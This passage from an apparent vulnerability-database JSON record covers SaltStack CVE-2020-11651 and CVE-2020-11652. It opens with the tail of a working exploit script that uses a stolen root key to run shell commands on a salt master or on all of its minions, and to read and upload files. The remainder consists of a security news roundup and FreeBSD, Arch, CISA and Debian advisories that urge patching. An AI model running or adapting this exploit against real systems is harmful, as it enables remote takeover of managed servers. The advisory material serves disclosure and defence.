{}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n if check_salt_version():\r\n print(\"[ ] This version of salt is vulnerable! Check results below\")\r\n elif args.force:\r\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\r\n else:\r\n sys.exit()\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('\\n[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34389"}], "trendmicroblog": [{"lastseen": "2020-05-29T15:51:50", "bulletinFamily": "blog", "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how, over the past five years, the cybercriminal underground has seen a major shift to new platforms, communications channels, products, and services. Also, read about a new wave of Sandworm cyberattacks against email servers conducted by one of Russia's most advanced cyber-espionage units.\n\nRead on:\n\n[**How the Cybercriminal Underground Has Changed in 5 Years**](<https://blog.trendmicro.com/how-the-cybercriminal-underground-has-changed-in-5-years/>)\n\n_Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, it has seen a major shift to new platforms, communications channels, products, and services, as trust on the dark web erodes and new market demands emerge. Trend Micro expects the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities._\n\n[**Shadowserver, an Internet Guardian, Finds a Lifeline**](<https://www.wired.com/story/shadowserver-funding-trend-micro-internet-society/>)\n\n_In March, internet security group Shadowserver_ _learned that longtime corporate sponsor Cisco was ending its support. With just weeks to raise hundreds of thousands of dollars to move its data center out of Cisco's facility\u2014not to mention an additional $1.7 million to make it through the year\u2014the organization was at real risk of extinction. Ten weeks later, Shadowserver has come a long way toward securing its financial future. This week, Trend Micro committed $600,000 to Shadowserver over three years, providing an important backbone to the organization's fundraising efforts. _\n\n[**#LetsTalkSecurity: No Trust for the Wicked**](<https://trendtalks.fyi/security/>)** **\n\n_This Week, Rik Ferguson, vice president of Security Research at Trend Micro, hosted the fourth episode of #LetsTalkSecurity featuring guest Dave Lewis, Global Advisory CISO at Duo Security. Check out this week\u2019s episode and follow the link to find information about upcoming episodes and guests._\n\n[**Principles of a Cloud Migration \u2013 Security W5H \u2013 The HOW**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-security-w5h-the-how/>)\n\n_Security needs to be treated much like DevOps in evolving organizations, meaning everyone in the company has a shared responsibility to make sure it is implemented. It is not just a part of operations, but a cultural shift in doing things right the first time \u2013 security by default. In this blog from Trend Micro, learn 3 tips to get you started on your journey to securing the cloud. _\n\n[**What\u2019s Trending on the Underground Market?**](<https://www.helpnetsecurity.com/2020/05/27/underground-market-trends/>)\n\n_Trust has eroded among criminal interactions in the underground markets, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, a new Trend Micro report reveals._ _Determined efforts by law enforcement appear to be having an impact on the cybercrime underground as several forums have been taken down by global police entities. _\n\n[**Is Cloud Computing Any Safer from Malicious Hackers?**](<https://blog.trendmicro.com/is-cloud-computing-any-safer-from-malicious-hackers/>)\n\n_Cloud computing has revolutionized the IT world, making it easier for companies to deploy infrastructure and applications and deliver their services to the public. The idea of not spending millions of dollars on equipment and facilities to host an on-premises data center is a very attractive prospect to many. But is cloud computing any safer from malicious threat actors? Read this blog from Trend Micro to find out. _\n\n[**Smart Yet Flawed: IoT Device Vulnerabilities Explained**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/smart-yet-flawed-iot-device-vulnerabilities-explained>)\n\n_The variety and range of functions of smart devices present countless ways of improving different industries and environments. While the \u201cthings\u201d in the internet of things (IoT) benefits homes, factories, and cities, these devices can also introduce blind spots and security risks in the form of vulnerabilities. Vulnerable smart devices open networks to attack vectors and can weaken the overall security of the internet. For now, it is better to be cautious and understand that \u201csmart\u201d can also mean vulnerable to threats._\n\n[**Cyberattacks Against Hospitals Must Stop, Says Red Cross**](<https://www.zdnet.com/article/cyberattacks-against-hospitals-must-stop-says-red-cross/>)\n\n_Immediate action needs to be taken to stop cyberattacks targeting hospitals and healthcare organizations during the ongoing coronavirus pandemic \u2013 and governments around the world need to work together to make it happen, says a newly published open letter signed by the International Committee of the Red Cross, former world leaders, cybersecurity executives and others._\n\n[**Securing the 4 Cs of Cloud-Native Systems: Cloud, Cluster, Container, and Code**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/securing-the-4-cs-of-cloud-native-systems-cloud-cluster-container-and-code>)\n\n_Cloud-native technologies enable businesses to make the most of their cloud resources with less overhead, faster response times, and easier management._ _Like any technology that uses various interconnected tools and platforms, security plays a vital role in cloud-native computing. Cloud-native security adopts the defense-in-depth approach and divides the security strategies utilized in cloud-native systems into four different layers._\n\n[**Coinminers Exploit SaltStack Vulnerabilities CVE-2020-11651 and CVE-2020-11652**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/coinminers-exploit-saltstack-vulnerabilities-cve-2020-11651-and-cve-2020-11652>)\n\n_Researchers from F-Secure recently disclosed two high-severity vulnerabilities in SaltStack Salt: CVE-2020-11651, an authentication bypass vulnerability, and CVE-2020-11652, a directory traversal vulnerability. These can be exploited by remote, unauthenticated attackers, and all versions of SaltStack Salt before 2019.2.4 and 3000 before 3000.2 are affected. Trend Micro has witnessed attacks exploiting these vulnerabilities, notably those using cryptocurrency miners._\n\n[**PonyFinal Ransomware Targets Enterprise Servers Then Bides Its Time**](<https://threatpost.com/ponyfinal-ransomware-enterprise-servers/156083/>)\n\n_A Java-based ransomware known as PonyFinal has emerged, targeting enterprise systems management servers as an initial infection vector. It exfiltrates information about infected environments, spreads laterally and then waits before striking \u2014 the operators go on to encrypt files at a later date and time, when the likelihood of the target paying is deemed to be the most likely._\n\n[**Qakbot Resurges, Spreads through VBS Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files>)\n\n_Trend Micro has seen events that point to the resurgence of Qakbot, a multi-component, information-stealing threat first discovered in 2007. Feedback from Trend Micro\u2019s sensors indicates that Qakbot detections increased overall. A notable rise in detections of a particular Qakbot sample (detected by Trend Micro as Backdoor.Win32.QBOT.SMTH) was also witnessed in early April. _\n\n[**CSO Insights: SBV\u2019s Ian Keller on the Challenges and Opportunities of Working Remotely**](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/cso-insights-sbv-s-ian-keller-on-the-challenges-and-opportunities-of-working-remotely>)\n\n_The COVID-19 pandemic has forced businesses to change the way they operate. These abrupt changes come with a unique set of challenges, including security challenges. Ian Keller, Chief Security Officer of SBV Services in South Africa, sat down with Trend Micro and shared his thoughts on how SBV is coping with the current pandemic, the main challenges they faced when transitioning their staff to remote work, as well as how they plan to move forward._\n\n[**NSA Warns of New Sandworm Attacks on Email Servers**](<https://www.zdnet.com/article/nsa-warns-of-new-sandworm-attacks-on-email-servers/>)\n\n_The US National Security Agency (NSA) has published a security alert warning of a new wave of cyberattacks against email servers, attacks conducted by one of Russia's most advanced cyber-espionage units. The NSA says that members of Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, have been attacking email servers running the Exim mail transfer agent (MTA)._\n\n[**Forward-Looking Security Analysis of Smart Factories &lt;Part 2&gt; Security Risks of Industrial Application Stores**](<https://www.trendmicro.com/us/iot-security/news/5859/Forward_looking_security_analysis_of_smart_factories_Part_2_Security_risks_of_industrial_application_stores>)\n\n_In the second part of this five series column, Trend Micro looks at the security risks to be aware of when promoting smart factories by examining overlooked attack vectors, feasible attack scenarios, and recommended defense strategies. This column is especially applicable for architects, engineers, and developers who are involved in smart factory technology. _\n\n[**Factory Security Problems from an IT Perspective (Part 2): People, Processes, and Technology**](<https://www.trendmicro.com/us/iot-security/news/5844/Factory_Security_Problems_from_an_IT_Perspective_Part_2_People_processes_and_technology>)\n\n_This blog is the second in a series that discusses the challenges that IT departments face when they are assigned the task of overseeing cybersecurity in factories and implementing measures to overcome these challenges. In this article, Trend Micro carries out an analysis to uncover the challenges that lie in the way of promoting factory security from an IT perspective._\n\n[**21 Tips to Stay Secure, Private, and Productive as You Work from Home on Your Mac**](<https://blog.trendmicro.com/21-tips-to-stay-secure-private-and-productive-as-you-work-from-home-on-your-mac/>)\n\n_If you brought a Mac home from the office, it\u2019s likely already set up to meet your company\u2019s security policies. But what if you are using your personal Mac to work from home? You need to outfit it for business, to protect it and your company from infections and snooping, while ensuring it continues to run smoothly over time. In this blog, learn 21 tips for staying secure, private, and productive while working from home on your Mac. _\n\nSurprised by the new wave of Sandworm attacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers](<https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-05-29T12:27:26", "published": "2020-05-29T12:27:26", "id": "TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D", "href": "https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/", "type": "trendmicroblog", "title": "This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2021-07-28T14:34:26", "description": "\nF-Secure reports:\n\nCVE-2020-11651 - Authentication bypass vulnerabilities\nThe ClearFuncs class processes unauthenticated requests and\n\t unintentionally exposes the _send_pub() method, which can be used to\n\t queue messages directly on the master publish server. Such messages\n\t can be used to trigger minions to run arbitrary commands as root.\nThe ClearFuncs class also exposes the method _prep_auth_info(),\n\t which returns the \"root key\" used to authenticate commands from the\n\t local root user on the master server. This \"root key\" can then be\n\t used to remotely call administrative commands on the master server.\n\t This unintentional exposure provides a remote un-authenticated\n\t attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities\nThe wheel module contains commands used to read and write files\n\t under specific directory paths. The inputs to these functions are\n\t concatenated with the target directory and the resulting path is not\n\t canonicalized, leading to an escape of the intended path restriction.\nThe get_token() method of the salt.tokens.localfs class (which is\n\t exposed to unauthenticated requests by the ClearFuncs class) fails\n\t to sanitize the token input parameter which is then used as a\n\t filename, allowing insertion of \"..\" path elements and thus reading\n\t of files outside of the intended directory. The only restriction is\n\t that the file has to be deserializable by salt.payload.Serial.loads().\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "title": "salt -- multiple vulnerabilities in salt-master process", "type": "freebsd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-04-30T00:00:00", "id": "6BF55AF9-973B-11EA-9F2C-38D547003487", "href": "https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:58", "description": "Arch Linux Security Advisory ASA-202005-1\n=========================================\n\nSeverity: Critical\nDate : 2020-05-05\nCVE-ID : CVE-2020-11651 CVE-2020-11652\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1147\n\nSummary\n=======\n\nThe package salt before version 2019.2.4-1 is vulnerable to multiple\nissues including arbitrary command execution and arbitrary filesystem\naccess.\n\nResolution\n==========\n\nUpgrade to 2019.2.4-1.\n\n# pacman -Syu \"salt>=2019.2.4-1\"\n\nThe problems have been fixed upstream in version 2019.2.4.\n\nWorkaround\n==========\n\nDo not expose salt-master to the internet.\n\nDescription\n===========\n\n- CVE-2020-11651 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class does not\nproperly validate method calls. This allows a remote user to access\nsome methods without authentication. These methods can be used to\nretrieve user tokens from the salt master and/or run arbitrary commands\non salt minions.\n\n- CVE-2020-11652 (arbitrary filesystem access)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class allows access\nto some methods that improperly sanitize paths. These methods allow\narbitrary directory access to authenticated users.\n\nImpact\n======\n\nA remote unauthenticated user can execute arbitrary commands and access\nfiles on the affected host.\n\nReferences\n==========\n\nhttps://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\nhttps://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst\nhttps://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7\nhttps://github.com/saltstack/salt/commit/cce7abad9c22d9d50ccee2813acabff8deca35dd\nhttps://security.archlinux.org/CVE-2020-11651\nhttps://security.archlinux.org/CVE-2020-11652", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "archlinux", "title": "[ASA-202005-1] salt: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "ASA-202005-1", "href": "https://security.archlinux.org/ASA-202005-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:48", "description": "SaltStack has released a security update to address critical vulnerabilities affecting Salt versions prior to 2019.2.4 and 3000.2. Salt is an open-source remote task and configuration management framework widely used in data centers and cloud servers. A remote attacker could exploit these vulnerabilities to take control of an affected system. These vulnerabilities were detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following SaltStack products and apply the necessary update as soon as possible: \n\n * Release Notes for [Salt 2019.2.4](<https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html>) and [Salt 3000.2](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>)\n * Blog on [Critical Vulnerabilities Update: CVE-2020-11651 and CVE-2020-11652 ](<https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/ >)\n * Tips on [Hardening Salt](<https://docs.saltstack.com/en/latest/topics/hardening.html#general-hardening-tip>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/saltstack-patches-critical-vulnerabilities-salt>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "cisa", "title": "SaltStack Patches Critical Vulnerabilities in Salt", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T00:00:00", "id": "CISA:6A06982A8847F277D71953FBD9CA4A0E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/saltstack-patches-critical-vulnerabilities-salt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-06-08T22:29:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T20:16:23", "title": "[SECURITY] [DSA 4676-2] salt security update", "type": "debian", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-07T20:16:23", "id": "DEBIAN:DSA-4676-2:0B1C8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00085.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T22:32:46", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 12, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-30T04:21:36", "title": "[SECURITY] [DLA 2223-1] salt security update", "type": "debian", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-30T04:21:36", "id": "DEBIAN:DLA-2223-1:998E3", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202005/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T22:25:16", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-06T04:15:52", "title": "[SECURITY] [DSA 4676-1] salt security update", "type": "debian", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "modified": "2020-05-06T04:15:52", "id": "DEBIAN:DSA-4676-1:8BF11", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00079.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2020-05-05T21:39:19", "description": "", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, 